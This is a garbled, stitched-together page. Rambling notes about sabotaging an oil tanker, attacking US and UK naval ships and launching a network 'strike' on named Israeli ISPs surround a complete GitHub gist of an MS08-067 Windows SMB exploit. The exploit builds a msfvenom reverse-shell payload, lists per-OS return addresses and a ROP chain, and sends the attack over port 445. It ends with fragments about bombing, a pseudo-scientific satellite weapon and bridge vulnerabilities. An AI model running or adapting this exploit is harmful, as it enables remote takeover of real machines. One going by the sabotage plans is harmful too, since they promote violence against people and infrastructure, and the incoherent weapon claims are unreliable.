surprise factor ///warfare folder....attack Iran vs US

remove a mine from a oil tanker full with methanol, as a normal operation of security...get close the oil tanker from a US or UK navy ship, so it can kill...then acidentally exploded it...as soon as they show up with drones, light laser crossing the skyp, the areas they want to erase...and then hit with missiles strike...after one! hit of them on your soil....2 naval ships...choose the ones that will block the F16s from flying over your coast bcz of the smoke, both north and south cardinals

 strike Israel with sabotage port 1028 TCP, where they have all their firewalls..forget Elbit ...strike ...hit
Hot-Net internet services Ltd.
Cellcom Fixed Line Communication L.P.
Bezeq International-Ltd

2019 SEH Buffer Overflow Exploit drones attack hack folder

Skip to content

All gists Back to GitHub

Sign in Sign up

Instantly share code, notes, and snippets.

thel3l/ms08-067-fixed.py

Created last year

• 0

Code

Revisions 1

Updated ms08-67 exploit without custom netcat listener.

ms08-067-fixed.py

#!/usr/bin/python

###############################################################################################

# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 #

# Designed for Kali Linux - msfvenom and nc required to function #

# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ #

# Modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/). #

# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi #

###############################################################################################

import struct

import time

import sys

import subprocess # Added to integrate msfvenom payload generation functionality

from threading import Thread #Thread is imported incase you would like to modify

try:

from impacket import smb

from impacket import uuid

from impacket import dcerpc

from impacket.dcerpc.v5 import transport

except ImportError, _:

print 'Install the following library to make this script work'

print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'

print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'

sys.exit(1)

if __name__ == '__main__':

try:

target = sys.argv[1]

os = sys.argv[2]

lhost = sys.argv[3]

lport = sys.argv[4]

except IndexError:

print ''

print ' ____________________________________________'

print ' | |'

print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |'

print ' | Based On Ported MSF Exploit By EKOZ |'

print ' |____________________________________________|'

print ' | |'

print ' | USAGE |'

print ' | MS08-067.py |'

print ' | eg: MS08-067.py 10.1.1.1 3 10.2.2.2 53 |'

print ' |____________________________________________|'

print ' | |'

print ' | TARGET OS SELECTION |'

print ' | 1 = Windows XP SP0/SP1 Universal |'

print ' | 2 = Windows 2000 Universal |'

print ' | 3 = Windows 2003 SP0 Universal |'

print ' | 4 = Windows 2003 SP1 English |'

print ' | 5 = Windows XP SP3 French (NX) |'

print ' | 6 = Windows XP SP3 English (NX) |'

print ' | 7 = Windows XP SP3 English (AlwaysOn NX) |'

print ' |____________________________________________|\r\n'

print ' I suggest you use a stageless payload to avoid issues with the handler.'

sys.exit(-1)

#badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;

#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes

#EXITFUNC=thread Important!

# msfvenom -p windows/shell_reverse_tcp --nopsled=32 LHOST=10.11.0.225 LPORT=53 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python

# Auto Generate Reverse Shell Payload Using msfvenom

mksh = "msfvenom -p windows/shell_reverse_tcp"

mksh += " -b \'\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\'"

mksh += " -e x86/call4_dword_xor"

mksh += " EXITFUNC=thread"

mksh += " --nopsled=32"

mksh += " LHOST="+lhost

mksh += " LPORT="+lport

mksh += " -f python "

mksh += " -a x86"

mksh += " -o RevPld.py"

print ' ____________________________________________'

print ' | |'

print ' | MS08-067 Exploit - Auto NC mod by 3mrgnc3 |'

print ' | Based On Ported MSF Exploit By EKOZ |'

print ' |____________________________________________|\r\n'

try:

print "[+] Attempting To Generate Reverse Shell Payload ..."

vnm = subprocess.Popen(mksh.split(), stdout=subprocess.PIPE)

vnm.wait()

print "[+] Reverse Shell Payload Generated Successfully..."

except:

print "[!] ERROR: Couldn't Generate Payload "

sys.exit(-1)

from RevPld import buf

nops = "\x90"*30

nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10

disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62"

ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01";

module_base = 0x6f880000

def generate_rop(rvas):

gadget1="\x90\x5a\x59\xc3"

gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]

gadget3="\xcc\x90\xeb\x5a"

ret=struct.pack(''

, 0x00018000)

ret+=struct.pack(''

, rvas['call_HeapCreate']+module_base)

ret+=struct.pack(''

, 0x01040110)

ret+=struct.pack(''

, 0x01010101)

ret+=struct.pack(''

, 0x01010101)

ret+=struct.pack(''

, rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)

ret+=struct.pack(''

, rvas['pop ecx / ret']+module_base)

ret+=gadget1

ret+=struct.pack(''

, rvas['mov [eax], ecx / ret']+module_base)

ret+=struct.pack(''

, rvas['jmp eax']+module_base)

ret+=gadget2[0]

ret+=gadget2[1]

ret+=struct.pack(''

, rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)

ret+=struct.pack(''

, rvas['pop ecx / ret']+module_base)

ret+=gadget2[2]

ret+=struct.pack(''

, rvas['mov [eax+0x10], ecx / ret']+module_base)

ret+=struct.pack(''

, rvas['add eax, 8 / ret']+module_base)

ret+=struct.pack(''

, rvas['jmp eax']+module_base)

ret+=gadget3

return ret

class SRVSVC_Exploit(Thread):

def __init__(self, target, os, port=445):

super(SRVSVC_Exploit, self).__init__()

self.__port = port

self.target = target

self.os = os

def __DCEPacket(self):

if (self.os=='1'):

print '[+] Targeting : Windows XP SP0/SP1 Universal'

ret = "\x61\x13\x00\x01"

jumper = nonxjmper % (ret, ret)

elif (self.os=='2'):

print '[+] Targeting : Windows 2000 Universal'

ret = "\xb0\x1c\x1f\x00"

jumper = nonxjmper % (ret, ret)

elif (self.os=='3'):

print '[+] Targeting : Windows 2003 SP0 Universal'

ret = "\x9e\x12\x00\x01" #0x01 00 12 9e

jumper = nonxjmper % (ret, ret)

elif (self.os=='4'):

print '[+] Targeting : Windows 2003 SP1 English'

ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL

ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL

jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL

disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL

jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)

elif (self.os=='5'):

print '[+] Targeting : Windows XP SP3 French (NX)'

ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07

disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2

jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.

elif (self.os=='6'):

print '[+] Targeting : Windows XP SP3 English (NX)'

ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07

disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2

jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.

elif (self.os=='7'):

print '[+] Targeting : Windows XP SP3 English (AlwaysOn NX)'

rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}

jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case.

else:

print '[+] OS Version Not Supported\n'

sys.exit(-1)

print '[+] Initiating Connection To '+target+":445"

self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)

self.__trans.connect()

self.__dce = self.__trans.DCERPC_class(self.__trans)

self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

path ="\x5c\x00"+"ABCDEFGHIJ"*10 + nops + buf +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"

path += "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2

server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"

prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"

self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"

return

def run(self):

self.__DCEPacket()

self.__dce.call(0x1f, self.__stub)

current = SRVSVC_Exploit(target, os)

current.start()

print "Now start up a multi/handler with your payload options set to: "

print "payload windows/shell_reverse_tcp" # seems to be the most stable and consistent.

print "LHOST ", lhost

print "LPORT ", lport

to join this conversation on GitHub. Already have an account? Sign in to comment

• © 2019 GitHub, Inc.
• Terms
• Privacy
• Security
• Status
• Help

• Contact GitHub
• Pricing
• API
• Training
• Blog
• About

0

who bomb that nuclear bunker at Louisville,ZA mr H..was Ismael...the best IDF pilot. He was at a 6 months comission, and returned monday! Missed the biggest scene ever, since 1st september 1945. And he can kill you. So...think about a stollen egg...

here we go again...back to war...another weekend A imagem pode conter: árvore, automóvel, céu, ar livre e natureza

intel folder .....Physics Nuclear Disable all weaponery ...a weapon...lunched by a satellite ...based...on...Nonrotating models of low metallicity evolve to pair-instability for helium-core masses...creation of electron–positron pairs...that could be called the PULSATIONAL weapon

David Forbes Ft. Emma Gillespie - Hurricane (Original Mix)

frequencia folder gas scheme surviving

sabotage terrorism folder..vulnerabity on bridges